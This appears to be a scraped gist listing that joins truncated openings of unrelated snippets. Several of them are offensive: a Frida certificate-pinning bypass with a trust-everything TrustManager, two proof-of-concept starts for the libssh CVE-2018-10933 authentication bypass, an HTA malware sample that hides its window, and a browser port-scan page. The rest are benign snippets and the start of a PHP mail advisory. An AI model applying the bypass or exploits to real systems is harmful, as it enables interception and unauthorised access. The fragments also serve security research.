Decompiled DLL with ILSpy to identify various commands.
Most commands can be found in DDM2._0_UX.CmdBackground.cmdService_DoWork
Write commands can be prefixed with int:command to specify which monitor to send the command to.
.\DDM.exe /0:writebrightnesslevel 50
| #!/bin/bash | |
| # From https://gist.github.com/ryancdotorg/84275935f0b82578d8c222e2e915fc78 | |
| # built binaries at https://ryanc-musl-bins.s3.amazonaws.com/SHA256SUMS.html | |
| set -eo pipefail | |
| set -x | |
| export BUILD_SCRIPT_DATE="$(date -r "$0" -Iseconds)" | |
| PV_VERSION=1.8.5 |
| Java.perform(function() { | |
| console.log('\n[.] Cert Pinning Bypass'); | |
| // Create a TrustManager that trusts everything | |
| console.log('[+] Creating a TrustyTrustManager that trusts everything...'); | |
| var X509TrustManager = Java.use('javax.net.ssl.X509TrustManager'); | |
| var TrustyTrustManager = Java.registerClass({ | |
| name: 'com.example.TrustyTrustManager', | |
| implements: [X509TrustManager], | |
| methods: { |
| # -*- mode: ruby -*- | |
| # vi: set ft=ruby : | |
| # After loading this | |
| # Install a pod network | |
| # $ kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=$(kubectl version | base64 | tr -d '\n') | |
| # Allow pods to run on the master node | |
| # $ kubectl taint nodes --all node-role.kubernetes.io/master- |
| #CVE-2018-10933 PoC modified from Minh Tuan Luong <not.soledad () gmail com> example PoC | |
| import paramiko | |
| import socket | |
| import sys | |
| nbytes = 4096 | |
| if len(sys.argv) < 2: | |
| print("Usage: " + sys.argv[0] + " <hostname> <port (optional: default 2222}>") | |
| exit(1) |
| #!/usr/bin/env python | |
| # Based on https://www.openwall.com/lists/oss-security/2018/08/16/1 | |
| # untested CVE-2018-10933 | |
| import sys, paramiko | |
| import logging | |
| username = sys.argv[1] | |
| hostname = sys.argv[2] | |
| command = sys.argv[3] |
| ## uploaded by @JohnLaTwC | |
| ## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde | |
| <html> | |
| <head> | |
| <script language="JScript"> | |
| window.resizeTo(1, 1); | |
| window.moveTo(-2000, -2000); | |
| window.blur(); | |
| try |
| <body> | |
| <style>pre { white-space: inherit }</style> | |
| <pre id="log"></pre> | |
| <div id="ports" style="visibility: hidden; height: 0; width: 0;"></div> | |
| <iframe src="about:blank" name="x" id="x" style="display: none;"></iframe> | |
| </body> | |
| <script> | |
| var electrum = { | |
| logbreak: function() { e = document.createElement('br'); document.getElementById('log').appendChild(e); }, | |
| log: function(s) { e = document.createElement('span'); e.innerText = s+" "; document.getElementById('log').appendChild(e); }, |
| #ifndef BLE400_H | |
| #define BLE400_H | |
| // LEDs definitions for BLE400 | |
| #define LEDS_NUMBER 5 | |
| #define LED_START 18 | |
| #define LED_1 18 | |
| #define LED_2 19 | |
| #define LED_3 20 |
Paul Buonopane [email protected] at NamePros
PGP: https://keybase.io/zenexer
I'm working on cleaning up this advisory so that it's more informative at a glance. Suggestions are welcome.
This advisory addresses the underlying PHP vulnerabilities behind Dawid Golunski's [CVE-2016-10033][CVE-2016-10033], [CVE-2016-10045][CVE-2016-10045], and [CVE-2016-10074][CVE-2016-10074]. It assumes prior understanding of these vulnerabilities.
This advisory does not yet have associated CVE identifiers.
